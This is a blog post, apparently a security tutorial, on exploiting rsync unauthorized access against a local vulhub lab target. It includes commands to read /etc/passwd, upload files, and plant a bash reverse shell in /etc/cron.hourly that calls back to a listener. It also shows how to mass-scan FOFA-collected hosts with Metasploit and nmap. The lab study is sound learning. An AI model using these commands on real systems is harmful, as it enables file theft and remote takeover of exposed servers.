测试rsync未授权访问漏洞及批量检测

测试rsync未授权访问漏洞及批量检测

一、rsync未授权访问漏洞

端口:873

rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件 传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配 置 ACL 或访问密码,我们将可以读写目标服务器文件。

1.1 启动vulhub靶机

docker compose build
docker compose up -d

192.168.3.13:873 为本地靶机地址

1.2 判断:

rsync rsync://192.168.3.13:873
src            	src path

如果能访问到目录,那就是有,如果没提示,那就没有

注意:切换目录时,如果加斜杠,就是访问目录,如果不加斜杠,就是访问文件

读取文件:
rsync rsync://192.168.3.13:873/src/

1.3 下载文件:

rsync rsync://192.168.3.13:873/src/usr/etc/passwd ./桌面

将passwd下载到指定目录

1.4 上传文件:

 rsync -av 1.txt rsync://192.168.3.13:873/src/tmp

将当前目录的1.txt上传到目标靶机tmp目录下

1.5 反弹shell:

思路:使用定时任务来启动反弹shell

但是经过测试,靶机的crontab似乎没有安装,服务也没有启动,尝试启动服务失败,以下内容为具体操作

1.5.1 获取信息:
 rsync  rsync://192.168.3.13:873/src/etc/crontab ./cron.txt

crontab是一个定时任务,观察哪些任务可以取代

cat cron.txt
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

17 * * * * root cd / && run-parts --report /etc/cron.hourly

每小时的第17分钟,root用户会执行该目录下的所有文件

run-parts参数为执行该目录下的所有文件

这里我们将shell文件上传到该目录

1.5.2 先在本地制作文件
vim xp
/bin/bash -i >& /dev/tcp/192.168.3.12/5566 0>&1
1.5.3 给予文件操作权限
chmod +x xp
1.5.4 上传文件
rsync -av xp rsync://192.168.3.13:873/src/etc/cron.hourly  
1.5.5 监听端口
nc -lvvp 5566

等待程序自动执行

但该靶机似乎没有启动crond服务,尝试启动

service start crond

也没有成功

vim也没有安装

测试结束!

二、批量检测

2.1 收集信息

在fofa上搜索873端口的主机

port="873"

用爬虫将端口信息爬取,汇总到txt文档

注意文档格式为:

127.0.0.1
127.0.0.1
127.0.0.1

不要写端口号

爬虫程序参照上一篇文章
https://blog.csdn.net/m0_53073183/article/details/135944078

2.2 metaploit批量检测

使用metaploit中的模块 auxiliary(scanner/rsync/modules_list

# 启动metaploit
msfconsole
# 使用rsync检测模块
use auxiliary/scanner/rsync/modules_list 
# 设置检测ip文件
set rhosts file:/home/kali/Desktop/1.txt
# 设置线程数为3,可以根据电脑性能修改
set threads 3
# 运行
run 

有加号的说明有目录可以访问,但并不代表存在该漏洞,如果不需要输入密码直接访问,说明漏洞存在
在这里插入图片描述

2.3 nmap批量检测

nmap -p 873 -v --script rsync-list-modules -iL /home/kali/Desktop/1.txt -oN result.txt

-p 指定只扫873端口

-v 显示详细过程

–script rsync-list-modules 使用rsync模块

-iL 扫描指定文件中的ip地址

-oN 保存扫描结果到result.txt

三、结果处理

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
回答: 目前已经存在一些rsync漏洞,可以被攻击者利用来执行远程代码或者获取敏感信息。其中一种漏洞是在rsync服务端配置文件中,如果配置了"uid"和"gid"为root权限,并且没有启用chroot限制,则攻击者可以通过构造恶意的rsync请求来提升权限并执行恶意代码。此外,在一些版本的rsync中存在其他漏洞,攻击者可以利用这些漏洞来执行任意命令或者读取敏感文件。要防止漏洞利用,建议及时更新rsync到最新版本,并且配置合适的权限限制和访问控制,确保只有合法的用户可以访问rsync服务。另外,也应该定期审查rsync日志,以及监控系统中的异常行为。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [rsync 授权访问漏洞](https://blog.csdn.net/weixin_59086772/article/details/122195357)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [漏洞利用——Rsync匿名访问漏洞](https://blog.csdn.net/qq_33608000/article/details/104124375)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值